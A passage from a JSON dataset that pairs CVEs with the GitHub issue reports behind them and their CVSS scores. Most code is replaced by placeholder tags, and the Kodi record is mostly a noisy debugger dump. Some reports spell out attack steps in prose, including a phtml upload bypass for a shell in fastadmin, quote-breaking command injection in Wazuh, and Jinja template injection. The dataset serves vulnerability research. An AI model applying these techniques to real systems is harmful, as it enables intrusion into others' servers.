  90826. "description": "Kodi NUMBERTAG Buffer Overflow. Bug report Describe the bug The attached ASX FILE causes a crash in Kodi NUMBERTAG on Windows NUMBERTAG To reproduce the issue, the attached file poc.asx can be used. it should crash with an access violation like the following: Thread NUMBERTAG E4 exit Thread E NUMBERTAG exit Thread E NUMBERTAG exit Breakpoint at NUMBERTAG FFB6E NUMBERTAG set! INT3 breakpoint at APITAG NUMBERTAG FFB6E NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG Expected Behavior Should display file type not supported or unable to open file Actual Behavior To Reproduce Steps to reproduce the behavior: firstly, close running kodi application head =''' APITAG APITAG APITAG APITAG APITAG ''' APITAG fobj = APITAG APITAG APITAG poc.asx is generated now open with kodi . it will take hrs to open kodi .on some cases it crash FILETAG Debug NUMBERTAG E0BFF4D5C NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG E0BFF4D5D NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5E NUMBERTAG E0BFF4DA NUMBERTAG ERRORTAG null NUMBERTAG or unexpected EOF found in input stream NUMBERTAG E0BFF4D5E NUMBERTAG FF NUMBERTAG DAD4D return to APITAG from APITAG NUMBERTAG E0BFF4D5F NUMBERTAG E0BFF4DB NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D5F NUMBERTAG FFB6E NUMBERTAG C NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4D NUMBERTAG E NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG E0BFF4D NUMBERTAG FF NUMBERTAG D NUMBERTAG APITAG NUMBERTAG E0BFF4D NUMBERTAG CBDAC NUMBERTAG A0 &\"pt NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG CBDD NUMBERTAG F NUMBERTAG APITAG APITAG <REF HREF= PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF7D NUMBERTAG A NUMBERTAG E0BFF4DC NUMBERTAG BDA NUMBERTAG E0BFF4DC NUMBERTAG FF 
NUMBERTAG B NUMBERTAG B0 APITAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG FFB NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DBA NUMBERTAG YK NUMBERTAG F NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DC NUMBERTAG CBF NUMBERTAG PATHTAG NUMBERTAG E0BFF4DC NUMBERTAG E0BFF4DCA NUMBERTAG E0BFF4DCA NUMBERTAG F NUMBERTAG E0BFF4DCB NUMBERTAG F3AC NUMBERTAG E0BFF4DCB NUMBERTAG FFB NUMBERTAG C NUMBERTAG CD return to APITAG from APITAG NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DCC NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DCD NUMBERTAG FF NUMBERTAG CF1D NUMBERTAG return to APITAG from NUMBERTAG E0BFF4DCE NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DCE NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DCF NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CBDDD NUMBERTAG F NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG A NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AD NUMBERTAG F NUMBERTAG E0BFF4DD NUMBERTAG CB4C NUMBERTAG AC NUMBERTAG E0BFF4DD NUMBERTAG C NUMBERTAG E0BFF4DD NUMBERTAG FF NUMBERTAG E NUMBERTAG B return to APITAG from APITAG NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DD NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DD NUMBERTAG CBDA NUMBERTAG PATHTAG NUMBERTAG E0BFF4DD NUMBERTAG CB4AB NUMBERTAG E0BFF4DD NUMBERTAG E0BFF4DDA NUMBERTAG F NUMBERTAG 
E0BFF4DDA NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4EB NUMBERTAG E0BFF4DDC NUMBERTAG E0BFF4DDD NUMBERTAG CB6CA4D NUMBERTAG F NUMBERTAG E0BFF4DDD NUMBERTAG CB6C NUMBERTAG A NUMBERTAG F NUMBERTAG E0BFF4DDE NUMBERTAG E0BFF4DEF NUMBERTAG E0BFF4DDE NUMBERTAG FF NUMBERTAG C NUMBERTAG FEF return to APITAG from APITAG NUMBERTAG E0BFF4DDF NUMBERTAG CB4AB NUMBERTAG E0BFF4DDF NUMBERTAG CBF NUMBERTAG C NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DE NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG D1 return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG CB4AB NUMBERTAG E0BFF4DE NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG CBF NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4DE NUMBERTAG E0BFF4E0F NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEA NUMBERTAG E0BFF4DEB NUMBERTAG E0BFF4DEB NUMBERTAG FFB NUMBERTAG C NUMBERTAG DC return to APITAG from APITAG NUMBERTAG E0BFF4DEC NUMBERTAG CBF3CAC NUMBERTAG nd descriptors. Usage: class APITAG APITAG def my_abstract_method(self, ...): ... 
NUMBERTAG E0BFF4DEC NUMBERTAG E0BFF4DED NUMBERTAG F6EC NUMBERTAG E0BFF4DED NUMBERTAG E0BFF4DEE NUMBERTAG E0BFF4DEE NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DEF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4DF NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG DB NUMBERTAG APITAG NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG DA NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG FFB NUMBERTAG C NUMBERTAG E0BFF4DF NUMBERTAG CBF NUMBERTAG E0BFF4DF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG CBF0D4AC NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DF NUMBERTAG CB4AB NUMBERTAG E0BFF4DF NUMBERTAG E0BFF4DFA NUMBERTAG CBF NUMBERTAG A NUMBERTAG E0BFF4DFA8 FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4DFB NUMBERTAG FCFC NUMBERTAG E0BFF4DFB NUMBERTAG C NUMBERTAG A NUMBERTAG E0BFF4DFC NUMBERTAG E0BFF4DFC NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFD NUMBERTAG B NUMBERTAG E0BFF4DFD NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4DFE NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4DFE NUMBERTAG CBD0A NUMBERTAG PATHTAG NUMBERTAG E0BFF4DFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4DFF NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG FFB NUMBERTAG C NUMBERTAG D0 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD0D NUMBERTAG D NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG 
from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7BC NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG F7EC NUMBERTAG E0BFF4E NUMBERTAG CB NUMBERTAG C NUMBERTAG D NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG CB4C NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFF NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBDFB4C NUMBERTAG APITAG %s %s terminating (autodelete NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FC NUMBERTAG D5 return to APITAG from APITAG NUMBERTAG E0BFF4E0A NUMBERTAG E0BFF4E0A NUMBERTAG F NUMBERTAG E0BFF4E0B NUMBERTAG CBD0D NUMBERTAG D0 PATHTAG NUMBERTAG E0BFF4E0B NUMBERTAG FFB6E NUMBERTAG F NUMBERTAG B return to APITAG from NUMBERTAG E0BFF4E0C NUMBERTAG CBD0AA NUMBERTAG E0BFF4E0C NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E0D NUMBERTAG C8EC NUMBERTAG E0BFF4E0D NUMBERTAG CB NUMBERTAG A NUMBERTAG E0BFF4E0E NUMBERTAG C8FC NUMBERTAG E0BFF4E0E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E0F NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E0F NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG CBDA9AEE0 &\"\u00c0\u00c6I NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG CBDFB4A NUMBERTAG PATHTAG NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG C1C0 \"\u00f0\u201cQ NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG AD return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG C NUMBERTAG E1 return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FF 
NUMBERTAG F0 APITAG NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG FFD NUMBERTAG return to APITAG from APITAG NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG FFFFFFFFFFFFFFFE NUMBERTAG E0BFF4E NUMBERTAG C NUMBERTAG C NUMBERTAG E0BFF4E NUMBERTAG CBF0D4CC0 \" return list(iterable) Let the base class default method raise the ERRORTAG return APITAG o NUMBERTAG E0BFF4E NUMBERTAG CBD NUMBERTAG A8F NUMBERTAG F NUMBERTAG E0BFF4E NUMBERTAG FF NUMBERTAG CB NUMBERTAG BE return to APITAG from APITAG NUMBERTAG E0BFF4F7E NUMBERTAG E0BFF4F7E NUMBERTAG FFB NUMBERTAG C NUMBERTAG return to APITAG from NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F7F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E8FFFFFB NUMBERTAG E0BFF4F NUMBERTAG D0FFFFFB NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8A NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8B NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8C NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8D NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8E NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F8F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG E0BFF4F NUMBERTAG Your Environment Used Operating system: [ ] Windows NUMBERTAG Operating system version/name: Kodi version NUMBERTAG note: Once the issue is made we require you to update it with new information or Kodi versions should that be required. Team Kodi will consider your problem report however, we will not make any promises the problem will be solved.",
  90827. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  90828. "severity": "MEDIUM",
  90829. "baseScore": 5.5,
  90830. "impactScore": 3.6,
  90831. "exploitabilityScore": 1.8
  90832. },
  90833. {
  90834. "CVE_ID": "CVE-2021-43086",
  90835. "Issue_Url_old": "https://github.com/ARM-software/astc-encoder/issues/296",
  90836. "Issue_Url_new": "https://github.com/arm-software/astc-encoder/issues/296",
  90837. "Repo_new": "arm-software/astc-encoder",
  90838. "Issue_Created_At": "2021-10-22T05:18:39Z",
  90839. "description": "stack buffer overflow in function APITAG Version APITAG Environment Ubuntu NUMBERTAG bit Command Compile test program: APITAG Compile test program with address sanitizer: Update Makefile: CODETAG Compile program: APITAG Result The result of running without ASAN: CODETAG Information obtained by using ASAN: ERRORTAG Description ERRORTAG Poc Poc file is this URLTAG .",
  90840. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90841. "severity": "CRITICAL",
  90842. "baseScore": 9.8,
  90843. "impactScore": 5.9,
  90844. "exploitabilityScore": 3.9
  90845. },
  90846. {
  90847. "CVE_ID": "CVE-2021-43117",
  90848. "Issue_Url_old": "https://github.com/ambitiousleader/some-automated-script/issues/1",
  90849. "Issue_Url_new": "https://github.com/ambitiousleader/some-automated-script/issues/1",
  90850. "Repo_new": "ambitiousleader/some-automated-script",
  90851. "Issue_Created_At": "2021-10-27T08:08:15Z",
  90852. "description": "fastadmin NUMBERTAG file upload getshell. Detail: FILETAG ERRORTAG PATHTAG Line NUMBERTAG FILETAG There are four checks; let's analyse them one by one. PATHTAG APITAG Line NUMBERTAG checks that the uploaded file size is not bigger than the default limit. FILETAG PATHTAG APITAG Line NUMBERTAG PHP files and HTML files are not allowed to be uploaded. FILETAG PATHTAG APITAG Line NUMBERTAG checks that the file APITAG is in the default APITAG =$this->config list. FILETAG PATHTAG APITAG Line NUMBERTAG checks that the uploaded file is a picture, but the condition is a logical OR: as long as the client-supplied type value passes in_array the check returns true, so we can upload a file with another PHP-parsed suffix such as php5, phtml or php3. FILETAG Change the Content-Type to gif and the filename to xx.phtml. FILETAG However, phtml is not parsed by default; I found that if the CMS is deployed on Debian or Ubuntu the attack still works: the Debian/Ubuntu apache2 configuration file, written as follows, automatically includes the mods-enabled/*.conf files, which by default parse phtml as PHP. FILETAG FILETAG So, accessing the uploaded shell's URL completes the attack; this IP is my Debian machine's address. FILETAG",
  90853. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90854. "severity": "CRITICAL",
  90855. "baseScore": 9.8,
  90856. "impactScore": 5.9,
  90857. "exploitabilityScore": 3.9
  90858. },
  90859. {
  90860. "CVE_ID": "CVE-2021-43398",
  90861. "Issue_Url_old": "https://github.com/weidai11/cryptopp/issues/1080",
  90862. "Issue_Url_new": "https://github.com/weidai11/cryptopp/issues/1080",
  90863. "Repo_new": "weidai11/cryptopp",
  90864. "Issue_Created_At": "2021-10-28T08:39:07Z",
  90865. "description": "Dangerous Correlation Between Key Length and Execution Time. Hello. I'm using Crypto++ built from the latest version of the source code in this repository on Ubuntu NUMBERTAG The function is as follows: CODETAG It seems that the execution time of APITAG is positively correlated with the length of the private key rather than being constant. I did a simple experiment and here is the result; I have not studied the root cause yet. FILETAG I suppose this may leak the length of the input private key through timing and facilitate attacks against the key. Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes, which is a little inconvenient for me. Hope you can check this case. Have a good day!",
  90866. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  90867. "severity": "MEDIUM",
  90868. "baseScore": 5.3,
  90869. "impactScore": 1.4,
  90870. "exploitabilityScore": 3.9
  90871. },
  90872. {
  90873. "CVE_ID": "CVE-2021-43518",
  90874. "Issue_Url_old": "https://github.com/teeworlds/teeworlds/issues/2981",
  90875. "Issue_Url_new": "https://github.com/teeworlds/teeworlds/issues/2981",
  90876. "Repo_new": "teeworlds/teeworlds",
  90877. "Issue_Created_At": "2021-10-23T10:33:38Z",
  90878. "description": "Stack buffer overflow (write) while loading map in APITAG APITAG The client crashes when an invalid map ( FILETAG is loaded. Such a map can be delivered to the client by a malicious server. Tested on Ubuntu NUMBERTAG Teeworlds version: APITAG URLTAG Compilation with ASAN: CODETAG Run and connect to a server that delivers an invalid map: ERRORTAG Compilation without ASAN: APITAG Run and connect to a server that delivers an invalid map: APITAG",
  90879. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90880. "severity": "HIGH",
  90881. "baseScore": 7.8,
  90882. "impactScore": 5.9,
  90883. "exploitabilityScore": 1.8
  90884. },
  90885. {
  90886. "CVE_ID": "CVE-2021-43854",
  90887. "Issue_Url_old": "https://github.com/nltk/nltk/issues/2866",
  90888. "Issue_Url_new": "https://github.com/nltk/nltk/issues/2866",
  90889. "Repo_new": "nltk/nltk",
  90890. "Issue_Created_At": "2021-10-26T21:56:15Z",
  90891. "description": "word_tokenize/EN hangs on incorrect strings. Hi NLTK team, I have a string that I pass to APITAG (which uses ERRORTAG under the hood), and the call hangs. The string in question is taken from Wikipedia and is the result of some vandalism. It can be generated by this APITAG The call seems to hang; I did not dig too deep, but after running this for a couple of hours I just stopped the process. What would be an acceptable way to process this robustly? I have a pipeline that has correct sentences as well as, from time to time, this kind of sentence.",
  90892. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90893. "severity": "HIGH",
  90894. "baseScore": 7.5,
  90895. "impactScore": 3.6,
  90896. "exploitabilityScore": 3.9
  90897. },
  90898. {
  90899. "CVE_ID": "CVE-2021-44079",
  90900. "Issue_Url_old": "https://github.com/wazuh/wazuh/issues/10858",
  90901. "Issue_Url_new": "https://github.com/wazuh/wazuh/issues/10858",
  90902. "Repo_new": "wazuh/wazuh",
  90903. "Issue_Created_At": "2021-11-16T09:26:07Z",
  90904. "description": "Active response tools allow arbitrary code execution. APITAG APITAG APITAG APITAG NUMBERTAG Active response script | APITAG | Packages | APITAG NUMBERTAG This issue was reported by MENTIONTAG We found a command injection bug in the active response script FILETAG . The alert JSON data is placed on the shell command line as the POST body for curl: CODETAG However, the raw log line, which can be partially controlled by an attacker, is also included in the JSON data. Single quotes in the JSON are not escaped and can therefore be used to terminate the quoted argument and inject further shell commands: APITAG Steps to reproduce: First, we add the APITAG active response in the config: CODETAG Then we set up a web server on the client machine and send a request with a crafted User-Agent: APITAG The shellshock APITAG will trigger an alert, and the crafted User-Agent value, which is recorded in the web server's access.log, is included in the command line as follows: CODETAG Here we use the single quote to break out of APITAG and inject the command APITAG with semicolons. We can verify this on the server where the APITAG runs (the Wazuh manager machine in this case, since we set the location to server in the active response config): APITAG Special thanks to MENTIONTAG for detecting and reporting this issue to the team.",
  90905. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  90906. "severity": "CRITICAL",
  90907. "baseScore": 9.8,
  90908. "impactScore": 5.9,
  90909. "exploitabilityScore": 3.9
  90910. },
  90911. {
  90912. "CVE_ID": "CVE-2021-44081",
  90913. "Issue_Url_old": "https://github.com/open5gs/open5gs/issues/1206",
  90914. "Issue_Url_new": "https://github.com/open5gs/open5gs/issues/1206",
  90915. "Repo_new": "open5gs/open5gs",
  90916. "Issue_Created_At": "2021-10-18T14:24:48Z",
  90917. "description": "Version NUMBERTAG AMF stack smashing. When I use open5gs version NUMBERTAG on an Ubuntu NUMBERTAG system, I found a problem: during the UE's initial registration, if the length of the MSIN (part of the SUPI) exceeds the normal length by NUMBERTAG characters, the AMF's stack is smashed, resulting in a denial of AMF service. FILETAG I analysed the cause of this problem: when open5gs handles the APITAG procedure, the destination buffer has a fixed size (OGS_MAX_IMSI_BCD_LEN is NUMBERTAG) and the AMF does not validate the length of the SUPI APITAG against it, which leads to a stack buffer overflow. FILETAG",
  90918. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  90919. "severity": "HIGH",
  90920. "baseScore": 7.5,
  90921. "impactScore": 3.6,
  90922. "exploitabilityScore": 3.9
  90923. },
  90924. {
  90925. "CVE_ID": "CVE-2021-44124",
  90926. "Issue_Url_old": "https://github.com/vext01/hiby-issues/issues/9",
  90927. "Issue_Url_new": "https://github.com/vext01/hiby-issues/issues/9",
  90928. "Repo_new": "vext01/hiby-issues",
  90929. "Issue_Created_At": "2021-08-29T17:42:19Z",
  90930. "description": "Path traversal vulnerability in web server. The web server used to upload music on HiBy OS devices does not protect against path traversal using APITAG. The vulnerability has already been publicly disclosed here: URLTAG This is still present in the latest NUMBERTAG firmware for the R3 Pro.",
  90931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  90932. "severity": "HIGH",
  90933. "baseScore": 7.5,
  90934. "impactScore": 3.6,
  90935. "exploitabilityScore": 3.9
  90936. },
  90937. {
  90938. "CVE_ID": "CVE-2021-44657",
  90939. "Issue_Url_old": "https://github.com/pallets/jinja/issues/549",
  90940. "Issue_Url_new": "https://github.com/pallets/jinja/issues/549",
  90941. "Repo_new": "pallets/jinja",
  90942. "Issue_Created_At": "2016-02-23T09:38:45Z",
  90943. "description": "Execute arbitrary code in a template without a sandboxed environment. When I use the Jinja2 template framework in my project, I found a way to call APITAG or other functions without registering them as globals. It is easy to get a shell when an attacker can control the template content (server-side template injection). Is this by design? APITAG ERRORTAG I tested this code with Python NUMBERTAG and Jinja NUMBERTAG if it works it will print your user's uid...",
  90944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  90945. "severity": "HIGH",
  90946. "baseScore": 8.8,
  90947. "impactScore": 5.9,
  90948. "exploitabilityScore": 2.8
  90949. },
  90950. {
  90951. "CVE_ID": "CVE-2021-45326",
  90952. "Issue_Url_old": "https://github.com/go-gitea/gitea/issues/4838",
  90953. "Issue_Url_new": "https://github.com/go-gitea/gitea/issues/4838",
  90954. "Repo_new": "go-gitea/gitea",
  90955. "Issue_Created_At": "2018-09-01T00:19:24Z",
  90956. "description": "APITAG CSRF checks on GET routes. The Vulnerabilities on GET Routes For historical reasons some GET routes in Gitea do more than get info and actually change state, for example /user/logout, and GET routes with action/:action in them. The current CSRF handler only checks POST routes, and thus leaves those GET routes vulnerable. One particular route PATHTAG should probably be a POST instead of a GET route. Strategies We are working on a PR to address these vulnerabilities, and would like community feedback on the best strategy. Option NUMBERTAG reuse the existing CSRF token + referrer policy header In this option we will append the existing CSRF token to vulnerable GET routes as a query string and validate the token. A referrer policy header can be set to same-origin to prevent the token leaking through the Referer header. Note that a token in the query string also ends up in browser history and in server/proxy access logs, which the referrer policy does not cover. This option has fewer changes to existing code. Option NUMBERTAG generate a new JWT token with a key exclusive for this purpose In this option we will generate a new JWT token and send it to the browser via a new cookie. This will have more changes to the code. Questions security concerns on reusing the CSRF token in the URL We are thinking of implementing option NUMBERTAG and have the code already done. It has fewer code changes and hopefully can be merged soon. Are there any concerns with this option NUMBERTAG response code or redirect What should we do if the required token is missing or invalid? Should we redirect to the home page, or return NUMBERTAG Browsers treat the NUMBERTAG error code differently; for example Chrome on Mac displays the following message, which may not be what you want. CODETAG Potential Impact Both options require an extra handler on vulnerable routes to check the token in the query string, and minor changes to URLs in templates. While the PR can include the new token in the default templates, this is potentially a breaking change for people using custom templates. The custom templates need to be updated to include the token in generated URLs.",
  90957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  90958. "severity": "HIGH",
  90959. "baseScore": 8.8,
  90960. "impactScore": 5.9,
  90961. "exploitabilityScore": 2.8
  90962. },
  90963. {
  90964. "CVE_ID": "CVE-2021-45357",
  90965. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1582",
  90966. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1582",
  90967. "Repo_new": "piwigo/piwigo",
  90968. "Issue_Created_At": "2021-12-15T13:48:11Z",
  90969. "description": "FILETAG It only handles GET, POST and COOKIE, so we can consider whether it can be bypassed through other parameters. Then I found out that Piwigo records the user's login and logout process. Take the logout process as an APITAG login is the same), in ERRORTAG ERRORTAG After that, let's see what the APITAG function does in ERRORTAG in this APITAG there is no filtering of the parameter APITAG FILETAG then the serialize and pwg_db_real_escape_string functions are executed respectively FILETAG look at APITAG it only prevents SQL injection ERRORTAG then we register a user APITAG FILETAG then we click logout FILETAG then we just POST like this; it is best to send several requests FILETAG CODETAG Next, after the system administrator has logged in and visits APITAG FILETAG and looks at it FILETAG",
  90970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  90971. "severity": "MEDIUM",
  90972. "baseScore": 6.1,
  90973. "impactScore": 2.7,
  90974. "exploitabilityScore": 2.8
  90975. },
  90976. {
  90977. "CVE_ID": "CVE-2021-45864",
  90978. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/476",
  90979. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/476",
